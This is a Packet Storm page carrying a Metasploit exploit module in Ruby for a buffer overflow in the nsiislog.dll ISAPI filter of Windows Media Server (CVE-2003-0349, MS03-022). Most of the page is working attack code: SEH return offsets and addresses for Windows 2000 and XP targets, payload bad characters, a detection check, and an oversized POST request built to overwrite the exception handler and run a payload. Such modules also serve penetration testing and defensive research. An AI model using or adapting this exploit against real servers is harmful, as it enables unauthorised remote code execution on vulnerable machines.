what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
Posted Jul 26, 2010
Authored by H D Moore | Site metasploit.com

This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This Metasploit module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.

tags | exploit, overflow
systems | windows
advisories | CVE-2003-0349
SHA-256 | c72f76f8a8253daffa9c80e5fc0eabf4bd5c86b37e4f1d22740423ea314f5177

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow

Change Mirror Download
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::BruteTargets
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
'Description' => %q{
This exploits a buffer overflow found in the nsiislog.dll
ISAPI filter that comes with Windows Media Server. This
module will also work against the 'patched' MS03-019
version. This vulnerability was addressed by MS03-022.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
[ 'CVE', '2003-0349'],
[ 'OSVDB', '4535'],
[ 'BID', '8035'],
[ 'MSB', 'MS03-022'],
[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
'StackAdjustment' => -3500,

},
'Platform' => 'win',
'Targets' =>
[
# SEH offsets by version (Windows 2000)
# 4.1.0.3917 = 9992
# 4.1.0.3920 = 9992
# 4.1.0.3927 = 9992
# 4.1.0.3931 = 14092

['Brute Force', { }],
['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }],
['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }],
],
'DisclosureDate' => 'Jun 25 2003',
'DefaultTarget' => 0))

register_options(
[
OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
], self.class)
end

def check
res = send_request_raw({
'uri' => datastore['URL']
}, -1)

if (res and res.body =~ /NetShow ISAPI/)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end

def exploit_target(target)

# Create a buffer greater than max SEH offset (16384)
pst = rand_text_alphanumeric(256) * 64

# Create SEH frame and insert into buffer
seh = generate_seh_payload(target['Rets'][1])
pst[target['Rets'][0], seh.length] = seh

# Send it to the server
print_status("Sending request...")
res = send_request_cgi({
'uri' => datastore['URL'],
'method' => 'POST',
'user-agent' => 'NSPlayer/2.0',
'content-type' => 'application/x-www-form-urlencoded',
'data' => pst
}, 5)

select(nil,nil,nil,1)

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close